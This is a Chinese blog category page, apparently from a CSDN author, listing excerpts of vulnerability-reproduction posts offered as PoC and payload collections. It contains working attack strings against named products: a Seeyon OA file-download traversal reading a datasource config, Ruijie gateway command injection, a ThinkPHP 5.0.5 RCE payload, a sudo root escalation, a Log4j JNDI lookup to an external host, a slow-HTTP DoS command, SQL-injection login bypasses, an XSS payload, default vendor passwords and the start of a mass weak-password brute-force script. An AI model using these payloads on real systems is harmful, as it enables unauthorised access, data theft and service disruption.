实战漏洞复现
各类漏洞挖掘poc&payload
想要订阅的小伙伴们不要错过呦
1stPeak
天行健,君子以自强不息;地势坤,君子以厚德载物。
展开
-
致翔OA漏洞复现手册
前言:致翔OA产品漏洞复现笔记,供自己使用,不定期更新声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。原创 2022-04-21 00:43:36 · 3609 阅读 · 0 评论 -
用友OA漏洞复现手册
用友OA漏洞复现手册前言:用友OA产品漏洞复现笔记,供自己使用,不定期更新原创 2022-04-20 18:39:51 · 15317 阅读 · 3 评论 -
华天OA漏洞复现手册
前言:万户OA产品漏洞复现笔记,供自己使用,不定期更新声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。漏洞列表:用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞万户OA download_ftp.jsp 任意文件下载漏洞漏洞描述万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件漏洞影响万户OA网络测绘app="万户网络-ezOFFICE"漏洞复现...原创 2022-04-21 00:20:19 · 5325 阅读 · 1 评论 -
CVE-2017-7921复现(解密文件)
前言:CSDN管理博客内容较严格,有些内容会涉嫌违法违规,以往发布的被打回,这篇文章是经修改后的,故下面有些内容我会粗略写到,大家主要看payload即可可解密:configurationFile原创 2021-06-03 15:02:45 · 12401 阅读 · 10 评论 -
CVE-2018-15473(OpenSSH用户枚举漏洞)
CVE-2018-15473复现笔记影响版本该影响自1999年以来至今年7.7版本中所有版本,远程攻击者可利用漏洞猜测在OpenSSH服务器上注册的用户名POC链接https://github.com/1stPeak/CVE-2018-15473POC环境配置git clone hhttps://github.com/1stPeak/CVE-2018-15473.gitcd CVE-2018-15473#注意:如果您在kali上安装,则可以跳过pip安装;paramiko已经在那里。.原创 2021-06-07 15:07:30 · 2612 阅读 · 0 评论 -
CVE-2019-2725复现(从环境搭建到getshell)
前言今天复现CVE-2019-2725时从环境搭建到getshell,这一篇文章是我测试之后总结的一次完整的复现测试流程,供大家参考,如有不足,欢迎指正。漏洞描述Oracle WebLogic Server反序列化漏洞 ,该远程代码执行漏洞无需身份验证即可远程利用,即无需用户名和密码即可通过网络利用。影响版本Oracle WebLogic Server,版本 10.3.6.0、12.1.3.0测试环境准备注:我这里主要介绍linux下weblogic的搭建1、Ubuntu我用的ubuntu原创 2021-07-16 21:54:07 · 6263 阅读 · 3 评论 -
远端WWW服务支持TRACE请求
漏洞描述远端WWW服务支持TRACE请求。RFC 2616介绍了TRACE请求,该请求典型地用于测试HTTP协议实现。攻击者利用TRACE请求,结合其它浏览器端漏洞,有可能进行跨站脚本攻击,获取敏感信息,比如cookie中的认证信息,这些敏感信息将被用于其它类型的攻击。漏洞验证...原创 2021-06-04 14:49:08 · 598 阅读 · 0 评论 -
CVE-2020-0796复现(poc+exp)
一、介绍Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程代码执行漏洞,也就是"Windows SMBv3客户端/服务器远程代码执行漏洞"。二、影响版本Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Vers原创 2021-07-14 16:26:04 · 1532 阅读 · 0 评论 -
CVE-2019-14287(sudo提权)
介绍如果sudo配置允许用户通过Runas规范中定义的ALL关键字来以任意用户身份运行命令,那么攻击者有可能通过制定用户ID以root权限执行恶意命令影响版本sudo版本<1.8.28查看sudo版本命令sudo -V复现前提:需要知道普通账号密码以root身份执行命令:sudo -u#-1 id或sudo -u#4294967259 whoami以root身份登录:sudo -u#-1 /bin/bash或sudo -u#4294967259 /bin/bash原创 2021-07-13 13:45:24 · 218 阅读 · 0 评论 -
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现
一、漏洞描述HTTP协议栈(HTTP.sys)存在远程代码执行漏洞,是由于HTTP.sys不正确的解析HTTP请求引起的,成功利用此漏洞的攻击者可以执行系统账户上任意代码。攻击者必须发送一个HTTP请求到受影响的系统去触发这个漏洞,通过修改Windows HTTP栈处理请求更新漏洞地址。主要存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受原创 2021-04-12 13:11:11 · 2893 阅读 · 3 评论 -
致远OA任意文件下载漏洞(CNVD-2020-62422)
漏洞描述致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息payload致远OA webmail.do文件读取漏洞,由于 /seeyon/webmail.do 页面 filePath 参数过滤不严,导致可以读取系统敏感文件。通过修改filePath参数来下载服务器文件/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.proper原创 2021-06-15 16:44:02 · 6889 阅读 · 0 评论 -
Elasticsearch未授权访问+Kibana任意操作
漏洞描述Elasticsearch是一款java编写的企业级搜索服务。越来越多的公司使用ELK作为日志分析,启动此服务默认会开放9200端口,可被非法操作数据,有些Elasticsearch用户还会安装Kibana用户界面,如未经任何处理,还会导致Kibana用户界面任意操作Payload未授权访问获取敏感信息/_cat/indices/_plugin/sql//_nodes/_search/_search?preety/_status测试1、访问9200端口,出现这个页面说明存在El原创 2021-06-04 10:18:18 · 1525 阅读 · 0 评论 -
CVE-2019-0708复现
漏洞描述微软官方紧急发布安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞(CVE-2019-0708),该漏洞影响了某些旧版本的Windows系统。该漏洞为预身份验证,无需用户交互。当未经身份验证的攻击者使用RDP(常见端口3389)连接到目标系统并发送特制请求时,可以在目标系统上执行任意命令,甚至传播恶意蠕虫,感染内网其他机器。该漏洞类似于2017年爆发的WannaCry等恶意勒索软件病毒。影响版本Windows 7Windows Server 2008 R2Windows Se原创 2021-06-04 11:31:30 · 976 阅读 · 0 评论 -
FTP匿名登陆
如果目标存在ftp匿名登陆,验证方法如下1、cmd验证:ftp xx.xx.xx.xx账号:anonymous密码:任意2、浏览器验证ftp://xx.xx.xx.xx原创 2021-06-04 14:37:30 · 3097 阅读 · 0 评论 -
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)原创 2022-03-25 09:47:10 · 21974 阅读 · 7 评论 -
Log4j远程代码执行漏洞验证
环境:poc:${jndi:ldap://baxpur.ceye.io}验证:原创 2021-12-22 20:45:00 · 2749 阅读 · 14 评论 -
任意用户注册&任意用户密码修改
1、任意用户注册漏洞描述:用户手机获取的验证码只有四位数字,可对其进行爆破,使用任意手机号进行注册并登录漏洞验证:2、任意用户密码修改漏洞描述:用户手机获取的验证码只有四位数字,可对其进行爆破,可以对任意手机号进行密码修改漏洞验证:...原创 2021-12-22 20:30:00 · 3250 阅读 · 0 评论 -
慢速HTTP拒绝服务攻击
实战记录:poc:slowhttptest -c 65539 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u URL -p 3原创 2021-12-22 20:00:00 · 1624 阅读 · 0 评论 -
弱口令-20211221
1、找到后台登陆界面2、对界面进行测试由此可以判断账号admin存在经bp爆破,未果。3、根据注册页面信息找到用户名称4、判断该用户名是否存在bp爆破5、登陆成功原创 2021-12-22 12:08:37 · 562 阅读 · 3 评论 -
根据网站敏感信息猜解账号密码
前言:挖洞时,找到手机号盲猜的账号密码,简单记录一下1、登陆界面2、寻找教师账号3、进行测试账号密码均为手机号原创 2021-12-22 11:52:48 · 506 阅读 · 0 评论 -
任意密码修改
前言这是做项目时其他人提交的,不难,简单记录一下,毕竟是公网的,测试前提是需要知道账户密码,是其修改密码的界面出现逻辑漏洞导致的1、比如,我们正常访问一个页面2、正常登录此时,我们已经正常登录,那么问题出在哪里呢,问题就在这里的修改密码3、抓包,点击修改密码逻辑问题就在这里,我们只要退出用户,然后直接在登陆界面抓包,修改内容即可未经登录修改账户密码4、通过登陆界面未授权修改账户密码将红框中的内容修改如下,即可绕过,成功修改admin用户密码为123456...原创 2021-10-24 21:00:27 · 772 阅读 · 0 评论 -
RTSP未授权访问
原创 2021-09-09 19:23:26 · 2206 阅读 · 0 评论 -
MS12_020漏洞
MS12_020:Microsoft windows远程桌面协议RDP远程代码执行漏洞注:这里不建议使用dos模块,会将目标攻击蓝屏,测试除外msf6 > search ms12_020msf6 > use 1msf6 auxiliary(scanner/rdp/ms12_020_check) > show options msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts IPmsf6 auxiliary(sc原创 2021-09-09 19:22:23 · 263 阅读 · 0 评论 -
Springboot配置不当
未获取密码中危,获取密码高危原创 2021-09-09 19:23:46 · 371 阅读 · 0 评论 -
未授权访问漏洞
文章目录1、访问目标URL2、抓包修改返回包信息1、访问目标URL2、抓包修改返回包信息越权访问注:这边抓包改包时间不能过长,否则会出现连接超时声明:该漏洞仅供学习参考,请勿用于非法用途!由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,与本文作者无关。...原创 2021-09-09 19:25:07 · 975 阅读 · 0 评论 -
短信逻辑漏洞
文章目录示例1示例2示例3注:文章相关法规要求,有些词汇不能显示,真实为短信hz漏洞示例1发送到爆破模块,修改POST请求内容POST /registerform HTTP/1.1Host: www.xxx.com.cnUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: application/json, text/javascript, */*; q=0原创 2021-09-04 13:15:10 · 1177 阅读 · 2 评论 -
网络安全设备常见弱口令
网上总结一下网络安全设备常见默认口令,方便后续自己查看安全设备默认用户名默认密码深信服sangforsangforsangfor@2018sangfor@2019深信服科技 ADdlanrecover深信服负载均衡 AD 3.6adminadmin深信服WAC ( WNS V2.6)adminadmin深信服VPNAdminAdmin深信服ipsec-VPN (SSL 5.5)AdminAdmin深信服A原创 2021-08-12 22:18:58 · 4498 阅读 · 1 评论 -
登陆界面万能密码绕过
常见万能密码:admin'--admin' or ''=''--admin' or 1=1--'or 1=1--admin'or''=''or'='or''or''='原创 2021-08-12 21:21:16 · 3307 阅读 · 2 评论 -
锐捷EG易网关远程命令执行漏洞-1
测试poc/guest_auth/guestIsUp.php如果没有返回任何信息,且状态码为200,那么很大可能存在远程命令执行payload如下将whoami命令执行结果输出到xxoo.txt文件中POST /guest_auth/guestIsUp.phpmac=1&ip=127.0.0.1|whoami > xxoo.txturl查看写入的文件,获取到目标当前用户和当前目录下的文件payload如下:http://xx.xx.xx.xx/guest_auth/xxo原创 2021-08-12 21:07:35 · 9385 阅读 · 0 评论 -
锐捷弱口令脚本
import requestsdef login(username,password,signname): fopen = open("4430.txt", 'r') lines = fopen.readlines() # print(lines) count = 0 for ip in lines: ip = ip.strip() #print(ip) url = "http://" + ip + ":8081/原创 2021-08-12 13:29:05 · 886 阅读 · 0 评论 -
反射型XSS
漏洞描述跨站点脚本(XSS)是指客户端代码注入攻击,其中,攻击者可以将恶意脚本执行到合法网站或Web应用程序中。当Web应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSS。漏洞验证http://xx.xx.xx.xx?id=1'"()%26%25<acx><ScRiPt%20>alert(9999)</ScRiPt>...原创 2021-06-04 14:25:23 · 287 阅读 · 0 评论 -
锐捷EG易网关与NBR路由器命令执行漏洞-2
锐捷EG易网关与NBR路由器——命令执行漏洞原创 2021-08-09 13:35:37 · 14549 阅读 · 8 评论 -
ThinkPHP5.0.5RCE
访问http://xx.xx.xx.xx:8080/index.php/?s=captchapayload:_method=__construct&filter[]=system&method=GET&get[]=系统命令示例如下:post传入_method=__construct&filter[]=system&method=GET&get[]=whoami进行命令执行post传入_method=__construct&filter原创 2021-08-06 22:09:47 · 886 阅读 · 2 评论